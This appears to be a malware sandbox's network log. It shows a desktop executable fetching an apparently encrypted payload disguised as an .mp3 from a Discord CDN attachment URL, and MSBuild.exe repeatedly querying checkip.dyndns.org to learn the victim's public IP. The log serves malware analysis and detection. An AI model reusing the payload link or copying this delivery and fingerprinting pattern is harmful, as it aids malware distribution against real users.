Apr 11, 2024 11:33:32.101530075 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 11, 2024 11:33:39.719729900 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:39 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49747	158.101.44.242	80	5408	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 11, 2024 11:33:35.200752020 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 11, 2024 11:33:46.808294058 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:46 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49749	158.101.44.242	80	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 11, 2024 11:33:40.280601025 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 11, 2024 11:33:48.749878883 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:48 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49751	158.101.44.242	80	5408	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 11, 2024 11:33:47.377238989 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 11, 2024 11:33:57.209315062 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:57 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49754	158.101.44.242	80	5408	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 11, 2024 11:33:58.041028023 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 11, 2024 11:34:01.582509995 CEST	682	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 11 Apr 2024 09:34:01 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49755	158.101.44.242	80	5408	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 11, 2024 11:34:01.744590044 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 11, 2024 11:34:03.898072958 CEST	682	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 11 Apr 2024 09:34:03 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Apr 11, 2024 11:34:03.902064085 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 11, 2024 11:34:06.055424929 CEST	682	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 11 Apr 2024 09:34:05 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.5	49756	158.101.44.242	80

Timestamp	Bytes transferred	Direction	Data
Apr 11, 2024 11:34:07.144032001 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 11, 2024 11:34:08.412054062 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:34:08 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	162.159.135.233	443	6180	C:\Users\user\Desktop\Pnihosiyvr.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-11 09:32:01 UTC	227	OUT	GET /attachments/1223189307423064096/1227506231204253746/Vfjvqmgnpj.mp3?ex=6628a743&is=66163243&hm=e36bea9e5aea3063f473ba3c29865ff160adc592430b1e4958d27899b61679dc& HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2024-04-11 09:32:01 UTC	1168	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:32:01 GMT Content-Type: audio/mpeg Content-Length: 2229256 Connection: close CF-Ray: 8729f78e68a74264-EWR CF-Cache-Status: MISS Accept-Ranges: bytes, bytes Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="Vfjvqmgnpj.mp3" ETag: "31c4b15339efe268f1d2e052670a4eae" Expires: Fri, 11 Apr 2025 09:32:01 GMT Last-Modified: Wed, 10 Apr 2024 06:31:31 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1712730691571736 x-goog-hash: crc32c=c+eJDA== x-goog-hash: md5=McSxUznv4mjx0uBSZwpOrg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 2229256 x-guploader-uploadid: ABPtcPoX1GYNJyRhWEbwiN6HhNYbkhoKKgTnfHpGaJS8ORtE51yNb37360Sgs9IzkLH4QGYw1NY X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=yfvwf.sl7t0SIc3HWGcd14nMrJHafK7cjrar1QZfDII-1712827921-1.0.1.1-OHAflmrTBAhR73Pf9U8bg0rG5dFDzPQ8tdnojizIwFu32lLhvgHiCDuwr1LdQqZT1p5DIgMr7iyTcnjQHCbzRA; path=/; expires=Thu, 11-Apr-24 10:02:01 GMT; domain=.discordapp.com; HttpOnly; Secure
2024-04-11 09:32:01 UTC	523	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 64 53 30 31 5a 36 59 56 59 30 42 65 32 63 35 55 6d 45 4d 37 6f 4f 73 25 32 42 41 6d 66 64 50 49 32 62 49 76 73 46 25 32 42 7a 38 25 32 46 6e 46 25 32 46 70 53 66 38 59 58 76 77 5a 68 7a 7a 62 7a 35 49 4e 52 57 74 6d 56 35 4d 75 49 61 66 47 44 70 6f 34 5a 66 68 67 4c 56 4d 49 4b 69 72 4f 73 4e 39 4c 78 48 44 25 32 42 58 52 64 6b 77 30 71 31 59 4f 63 44 53 69 52 67 39 74 53 73 6b 36 79 6e 53 53 39 59 70 70 64 4a 45 45 25 32 42 6e 25 32 42 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dS01Z6YVY0Be2c5UmEM7oOs%2BAmfdPI2bIvsF%2Bz8%2FnF%2FpSf8YXvwZhzzbz5INRWtmV5MuIafGDpo4ZfhgLVMIKirOsN9LxHD%2BXRdkw0q1YOcDSiRg9tSsk6ynSS9YppdJEE%2Bn%2BA%3D%3D"}],"group":"cf-nel","m
2024-04-11 09:32:01 UTC	1369	IN	Data Raw: f2 67 86 93 29 46 50 32 a4 ed 8f 78 59 11 4b 2d cb de 1f 15 38 1c 2d 9e 76 d3 c6 85 57 6d b7 d3 96 96 19 ba 8a 86 18 58 3b 22 a3 77 59 ba 02 bb 75 b3 63 67 b8 47 5f 87 35 7e 76 53 a7 b7 80 bd 59 6d 51 b4 e5 9f 87 2a 48 15 91 a5 0e 9b 09 b8 b5 17 13 84 32 b2 16 ca f5 4a 89 0c be 5e fd 88 de da 0e 2c 09 13 eb b9 fb e7 02 b6 de ed c7 d6 c1 39 c0 36 5b c6 e1 4d dc a3 89 6f 6a 9a 05 6e 27 26 a7 4b 19 08 12 64 37 62 71 bc 57 26 19 bc 6e 47 17 04 ae ce a9 f6 7c d9 e7 de fe 53 97 94 f3 00 41 62 1c d1 04 c9 3d 1f 78 3e 09 52 e0 27 c6 1c 7c f9 68 6d 0a 50 f0 7a c5 4b 3c 1a be a1 1e 74 4c ee 3e 15 a6 5f fa a5 f9 6d 4e dd 93 38 1d 3c dc 9a 63 1e 5d 37 ca 1f 74 63 58 86 e0 7f 4e 31 30 db 69 99 81 96 48 d2 0d 25 08 98 36 9b fd a8 1c a2 ea a3 a8 22 aa 42 89 d9 ca 14 0b Data Ascii: g)FP2xYK-8-vWmX;"wYucgG_5~vSYmQ*H2J^,96[Mojn'&Kd7bqW&nG\|SAb=x>R'\|hmPzK<tL>_mN8<c]7tcXN10iH%6"B
2024-04-11 09:32:01 UTC	1369	IN	Data Raw: 60 af af 50 7b f2 2e 37 55 35 85 31 ad a9 6d fc f1 78 cc 4b d3 8d c1 45 fc 08 12 30 70 81 46 fa 88 49 a4 d8 41 6d fd 74 25 b5 86 ef e4 c6 3b 54 d6 b6 d5 08 7e 43 1f 92 a7 7c d0 95 0d 42 11 50 b1 2d 77 e0 5c 8a d6 89 2f 5f 5b c5 c3 b2 9c 89 97 7b 8e 9f ad 4e 65 31 99 5b c0 ee 39 bc 04 7e 9b 99 2f dc 57 8f bf af 76 b0 da 54 a7 60 b3 f1 c4 72 de 2b fe a0 06 3b 8a 94 37 c0 1d fe 41 b7 67 2b 60 1c 6e b9 6c 68 08 d6 40 2d 4f 17 87 cc 84 63 ca ca 7d eb 7a d3 25 58 a1 e9 47 76 3c f8 3f 51 1b 63 07 90 63 eb de c1 f1 11 63 08 5f 0d d0 4d 3e eb e9 60 25 6f 32 55 a9 53 a3 ea 34 c0 58 0b 7c d7 04 56 39 16 62 8c 1c de 71 b8 84 09 60 46 0e c9 4c 44 7f 65 06 02 4e eb 10 cd 71 d4 7d 66 ae 8d 71 a2 ed 5c cd 44 d5 44 19 d0 b1 55 84 ba f5 c1 cf 5b f2 36 43 ca c7 1c 7e 49 f4 Data Ascii: `P{.7U51mxKE0pFIAmt%;T~C\|BP-w\/_[{Ne1[9~/WvT`r+;7Ag+`nlh@-Oc}z%XGv<?Qccc_M>`%o2US4X\|V9bq`FLDeNq}fq\DDU[6C~I
2024-04-11 09:32:01 UTC	1369	IN	Data Raw: 4d 52 fc 1d 13 5a 15 14 ca 41 4d 60 36 1e 9e df 01 2b 36 2e 71 b9 04 65 9c fc 4f 59 ba 75 2b 1e ce 7e 16 cf c2 93 f5 67 72 40 d5 29 6e cf 74 62 5e 2d 05 af 9d da 86 19 7d 9b b9 84 38 b7 fb 83 5c c3 20 10 4f e0 d1 fe a3 8a 56 c8 ec ec 9f 62 c8 e3 6e d1 25 f6 39 70 16 9a 61 fd 8c 36 bf 7b a6 b3 58 ec be fa 71 9e 66 bb 33 e4 72 75 89 0f 8b b9 d7 95 36 8f 25 51 c0 54 0a e4 b0 26 c7 d1 6d e9 55 0e 99 10 39 38 d4 ab 54 e8 86 2b c1 c1 f1 62 b0 13 c8 a7 04 5b ee e3 45 d5 27 fe 8f c1 17 0d 80 7a da c1 88 2b 66 f7 77 18 9f 50 03 ea 71 26 6b b9 03 cc dc 28 50 f7 d8 c6 43 31 a7 e9 34 6b 94 e5 76 73 6a 65 81 a1 67 25 24 27 7b ed ed 5b ae 7c 90 df d7 a5 fa 01 a8 5e 65 bf e7 db 4b 28 41 ab 29 11 1f 66 8c f6 62 40 14 6e c3 0a 40 05 1b aa 38 e4 16 83 a0 be 50 dd 3a 18 5d Data Ascii: MRZAM`6+6.qeOYu+~gr@)ntb^-}8\ OVbn%9pa6{Xqf3ru6%QT&mU98T+b[E'z+fwPq&k(PC14kvsjeg%$'{[\|^eK(A)fb@n@8P:]
2024-04-11 09:32:01 UTC	1369	IN	Data Raw: b4 43 e6 11 35 28 87 73 d9 14 08 0a ae 67 ec 2c 86 fd 4d 8d 83 ac ad 0a db 8b 60 89 e5 13 91 bd f4 2a 31 61 ea 90 53 dd d6 a9 0d 9c c6 52 50 7f 11 a3 b4 a2 6a 9b 7a 65 14 88 25 ad d9 01 73 19 18 42 83 9e 0c e4 3b 61 54 90 a4 8c 5a c4 86 61 eb 40 eb 6c fc b0 ab ec fc 77 81 75 af 3e 5c 78 46 7c 1e 3a e5 0c 0f a8 8d 13 cf 73 e1 15 96 f5 57 d5 3f 2d 48 ea c1 b0 22 4a 84 9f fd 5d 60 0e cf dd 89 10 be 30 03 b4 bd 15 a3 36 8a 09 c7 e1 b0 9d d5 5a 3e 77 12 15 ba 7e 81 2c 35 d4 59 06 35 c5 73 04 3f ab 3d 3c f7 1b ee ba 1a 02 4b 60 95 9b 2a 2e 69 cc f5 4c 69 20 fd 58 79 0f 42 d9 b3 af 7a 3c 8f a8 d5 1d 08 23 b4 b7 d9 65 de df 61 c0 9f 05 62 1d 8e a2 79 d4 9d b0 0f ce 0c de 60 1d db 14 81 a5 59 e1 06 48 a6 93 d0 8b 87 e1 34 3d 3e 40 07 99 bc 0b a3 16 c9 44 49 3a 52 Data Ascii: C5(sg,M`1aSRPjze%sB;aTZa@lwu>\xF\|:sW?-H"J]`06Z>w~,5Y5s?=<K`.iLi XyBz<#eaby`YH4=>@DI:R
2024-04-11 09:32:01 UTC	1369	IN	Data Raw: 89 6e 57 bc 70 98 66 fc 27 11 0c 54 24 10 42 ba 9a 1d c9 6f 91 a6 ac 2c 8c 47 a3 3e 10 ea 3e 57 0d a5 0e e5 85 20 e1 1d 7b b4 70 d8 80 8e b6 82 a4 78 c2 67 c6 37 fa 39 e3 d4 9c a3 73 98 b3 60 23 bb 12 f6 ca eb 38 5f 68 20 20 64 1e 31 9e ff cf e9 a4 cc 0e 93 b0 b7 e2 b4 96 a5 de 8d 7f 0b f0 99 27 30 5a 53 eb ae f9 bc 26 b3 96 11 cf 31 62 04 97 ce 4c 0d f5 ff 92 96 7e 50 e4 5b 58 88 df d9 7b aa ef 3c 52 69 8c 71 87 e2 7e 78 79 e9 82 de e5 c9 03 13 27 1b 25 bc d3 e9 9f 80 69 99 d9 2c ed e0 05 5f 97 1c 9a c3 7f 4f f5 f2 8e fa 18 94 bb c6 2c 0d 3c 31 ed ca ca 0f 89 53 2b 87 a6 8e e2 d7 67 fd 73 0f 04 db dc 22 fc 30 ce 8f 33 96 2c f7 aa 39 1e 7b bf 15 aa ca a0 24 f5 50 7a dc 47 89 d3 e3 73 a6 35 c9 10 38 f1 44 bc e5 c3 61 54 04 69 9b 44 03 26 88 12 a8 63 ea 9f Data Ascii: nWpf'T$Bo,G>>W {pxg79s`#8_h d1'0ZS&1bL~P[X{<Riq~xy'%i,_O,<1S+gs"03,9{$PzGs58DaTiD&c
2024-04-11 09:32:01 UTC	1369	IN	Data Raw: 66 7d 93 23 01 d1 2b ca 34 83 aa 0f 29 ad ba b6 12 2a c0 37 01 81 25 58 3e 26 95 58 88 45 07 7f 0b ea 86 99 0f 10 1d 71 e6 15 24 a5 c6 4a 8c e6 ea 2f d5 73 70 5a 42 d8 38 84 80 34 3a 79 6c 4c 97 d5 67 6b 0f ec 63 5d b3 90 cc 51 e9 f5 17 8d a5 43 0d 07 dc c9 3e 25 fc 87 3f 8f 9a 3c d6 9e bf 55 25 db e4 04 aa a1 38 7c 6e fa ac 4e a9 77 c0 e3 da a7 6e 8f bf ab ef 27 b8 50 47 c1 7f 6d 66 b7 a9 ec 1f b7 f2 bf 79 a8 67 8b d0 5a 64 27 cc 6c aa c2 3b d6 70 f9 d8 1b 0f 05 4d f5 ac 92 2d 2d f9 38 9e fb cb 10 a8 e3 46 90 90 76 2f 78 93 ab 32 88 e2 e8 3d 5c be 34 14 e2 a4 ed 84 25 0c 7f a7 6d 77 b2 6f 2a 0a 0d 2d b1 2c 17 19 c6 a1 11 98 56 c1 e0 06 c0 93 20 ae 6a e1 91 fe f7 f2 12 87 fa 7e 62 96 a7 ec 0a 41 fa 1a be ea 9f c3 78 08 c9 24 c3 5c 63 c7 d0 ee ba a3 c4 b0 Data Ascii: f}#+4)7%X>&XEq$J/spZB84:ylLgkc]QC>%?<U%8\|nNwn'PGmfygZd'l;pM--8Fv/x2=\4%mwo-,V j~bAx$\c
